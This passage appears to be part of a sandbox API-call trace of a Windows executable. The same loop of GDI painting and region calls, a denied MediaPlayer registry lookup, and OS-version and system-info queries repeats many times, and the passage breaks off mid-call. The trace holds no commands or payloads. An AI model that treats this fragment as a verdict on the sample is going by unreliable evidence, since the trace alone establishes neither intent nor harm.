[0088.195] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.195] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.195] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.195] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.195] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.195] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.195] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3e0401d3 [0088.195] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3c0401d6 [0088.195] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041014 [0088.195] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041015 [0088.195] CombineRgn (hrgnDst=0x1041014, hrgnSrc1=0x3e0401d3, hrgnSrc2=0x3c0401d6, iMode=1) returned 1 [0088.195] CombineRgn (hrgnDst=0x1041015, hrgnSrc1=0x3e0401d3, hrgnSrc2=0x3c0401d6, iMode=4) returned 2 [0088.195] CreateSolidBrush (color=0xff) returned 0x2101013 [0088.195] CreateSolidBrush (color=0xff0000) returned 0x1101016 [0088.195] DeleteObject (ho=0x1101016) returned 1 [0088.195] DeleteObject (ho=0x3c0401d6) returned 1 [0088.195] DeleteObject (ho=0x3e0401d3) returned 1 [0088.195] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.195] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.195] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.195] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.195] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.196] BeginPath (hdc=0x0) returned 0 [0088.196] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.196] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.196] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.196] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.196] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.196] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3d0401d6 [0088.196] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3f0401d3 [0088.196] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041017 [0088.196] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041018 [0088.196] CombineRgn (hrgnDst=0x1041017, hrgnSrc1=0x3d0401d6, hrgnSrc2=0x3f0401d3, iMode=1) returned 1 [0088.196] CombineRgn (hrgnDst=0x1041018, hrgnSrc1=0x3d0401d6, hrgnSrc2=0x3f0401d3, iMode=4) returned 2 [0088.196] CreateSolidBrush (color=0xff) returned 0x2101016 [0088.196] CreateSolidBrush (color=0xff0000) returned 0x1101019 [0088.196] DeleteObject (ho=0x1101019) returned 1 [0088.196] DeleteObject (ho=0x3f0401d3) returned 1 [0088.196] DeleteObject (ho=0x3d0401d6) returned 1 [0088.196] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.196] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.196] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.196] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.196] BeginPath (hdc=0x0) returned 0 [0088.196] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.196] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.196] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.196] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.196] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.196] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.196] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.196] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x400401d3 [0088.196] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3e0401d6 [0088.196] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104101a [0088.197] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104101b [0088.197] CombineRgn (hrgnDst=0x104101a, hrgnSrc1=0x400401d3, hrgnSrc2=0x3e0401d6, iMode=1) returned 1 [0088.197] CombineRgn (hrgnDst=0x104101b, hrgnSrc1=0x400401d3, hrgnSrc2=0x3e0401d6, iMode=4) returned 2 [0088.197] CreateSolidBrush (color=0xff) returned 0x2101019 [0088.197] CreateSolidBrush (color=0xff0000) returned 0x110101c [0088.197] DeleteObject (ho=0x110101c) returned 1 [0088.197] DeleteObject (ho=0x3e0401d6) returned 1 [0088.197] DeleteObject (ho=0x400401d3) returned 1 [0088.197] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.197] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.197] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.197] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.197] BeginPath (hdc=0x0) returned 0 [0088.197] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.197] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.197] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.197] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.197] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.197] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.197] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3f0401d6 [0088.197] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x410401d3 [0088.197] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104101d [0088.197] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104101e [0088.197] CombineRgn (hrgnDst=0x104101d, hrgnSrc1=0x3f0401d6, hrgnSrc2=0x410401d3, iMode=1) returned 1 [0088.197] CombineRgn (hrgnDst=0x104101e, hrgnSrc1=0x3f0401d6, hrgnSrc2=0x410401d3, iMode=4) returned 2 [0088.197] CreateSolidBrush (color=0xff) returned 0x210101c [0088.197] CreateSolidBrush (color=0xff0000) returned 0x110101f [0088.197] DeleteObject (ho=0x110101f) returned 1 [0088.197] DeleteObject (ho=0x410401d3) returned 1 [0088.197] DeleteObject (ho=0x3f0401d6) returned 1 [0088.197] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.197] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.197] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.198] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.198] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.198] BeginPath (hdc=0x0) returned 0 [0088.198] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.198] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.198] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.198] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.198] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.198] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.198] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.198] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x420401d3 [0088.198] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x400401d6 [0088.198] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041020 [0088.198] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041021 [0088.198] CombineRgn (hrgnDst=0x1041020, hrgnSrc1=0x420401d3, hrgnSrc2=0x400401d6, iMode=1) returned 1 [0088.198] CombineRgn (hrgnDst=0x1041021, hrgnSrc1=0x420401d3, hrgnSrc2=0x400401d6, iMode=4) returned 2 [0088.198] CreateSolidBrush (color=0xff) returned 0x210101f [0088.198] CreateSolidBrush (color=0xff0000) returned 0x1101022 [0088.198] DeleteObject (ho=0x1101022) returned 1 [0088.198] DeleteObject (ho=0x400401d6) returned 1 [0088.198] DeleteObject (ho=0x420401d3) returned 1 [0088.198] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.198] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.198] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.198] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.198] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.198] BeginPath (hdc=0x0) returned 0 [0088.198] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.198] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.198] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.198] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.198] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.198] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.198] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.232] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x410401d6 [0088.232] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x430401d3 [0088.232] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410b6 [0088.232] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410b7 [0088.232] CombineRgn (hrgnDst=0x10410b6, hrgnSrc1=0x410401d6, hrgnSrc2=0x430401d3, iMode=1) returned 1 [0088.232] CombineRgn (hrgnDst=0x10410b7, hrgnSrc1=0x410401d6, hrgnSrc2=0x430401d3, iMode=4) returned 2 [0088.232] CreateSolidBrush (color=0xff) returned 0x2101022 [0088.232] CreateSolidBrush (color=0xff0000) returned 0x11010b8 [0088.232] DeleteObject (ho=0x11010b8) returned 1 [0088.232] DeleteObject (ho=0x430401d3) returned 1 [0088.232] DeleteObject (ho=0x410401d6) returned 1 [0088.232] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.232] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.232] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.232] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.232] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.232] BeginPath (hdc=0x0) returned 0 [0088.232] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.232] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.232] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.232] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.232] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.232] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.232] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.232] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.232] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x440401d3 [0088.232] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x420401d6 [0088.232] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410b9 [0088.232] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410ba [0088.233] CombineRgn (hrgnDst=0x10410b9, hrgnSrc1=0x440401d3, hrgnSrc2=0x420401d6, iMode=1) returned 1 [0088.233] CombineRgn (hrgnDst=0x10410ba, hrgnSrc1=0x440401d3, hrgnSrc2=0x420401d6, iMode=4) returned 2 [0088.233] CreateSolidBrush (color=0xff) returned 0x21010b8 [0088.233] CreateSolidBrush (color=0xff0000) returned 0x11010bb [0088.233] DeleteObject (ho=0x11010bb) returned 1 [0088.233] DeleteObject (ho=0x420401d6) returned 1 [0088.233] DeleteObject (ho=0x440401d3) returned 1 [0088.233] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.233] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.233] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.233] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.233] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.233] BeginPath (hdc=0x0) returned 0 [0088.233] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.233] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.233] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.233] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.233] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.233] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.233] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.233] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.233] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x430401d6 [0088.233] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x450401d3 [0088.233] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410bc [0088.233] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410bd [0088.233] CombineRgn (hrgnDst=0x10410bc, hrgnSrc1=0x430401d6, hrgnSrc2=0x450401d3, iMode=1) returned 1 [0088.233] CombineRgn (hrgnDst=0x10410bd, hrgnSrc1=0x430401d6, hrgnSrc2=0x450401d3, iMode=4) returned 2 [0088.233] CreateSolidBrush (color=0xff) returned 0x21010bb [0088.233] CreateSolidBrush (color=0xff0000) returned 0x11010be [0088.233] DeleteObject (ho=0x11010be) returned 1 [0088.233] DeleteObject (ho=0x450401d3) returned 1 [0088.233] DeleteObject (ho=0x430401d6) returned 1 [0088.233] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.234] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.234] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.234] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.234] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.234] BeginPath (hdc=0x0) returned 0 [0088.234] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.234] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.234] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.234] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.234] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.234] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.234] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.234] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.234] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x460401d3 [0088.234] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x440401d6 [0088.234] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410bf [0088.234] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410c0 [0088.234] CombineRgn (hrgnDst=0x10410bf, hrgnSrc1=0x460401d3, hrgnSrc2=0x440401d6, iMode=1) returned 1 [0088.234] CombineRgn (hrgnDst=0x10410c0, hrgnSrc1=0x460401d3, hrgnSrc2=0x440401d6, iMode=4) returned 2 [0088.234] CreateSolidBrush (color=0xff) returned 0x21010be [0088.234] CreateSolidBrush (color=0xff0000) returned 0x11010c1 [0088.234] DeleteObject (ho=0x11010c1) returned 1 [0088.234] DeleteObject (ho=0x440401d6) returned 1 [0088.234] DeleteObject (ho=0x460401d3) returned 1 [0088.234] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.234] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.234] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.234] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.234] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.234] BeginPath (hdc=0x0) returned 0 [0088.235] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.235] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.235] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.235] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.235] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.235] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.235] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.235] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.235] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x450401d6 [0088.235] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x470401d3 [0088.235] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410c2 [0088.235] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10410c3 [0088.235] CombineRgn (hrgnDst=0x10410c2, hrgnSrc1=0x450401d6, 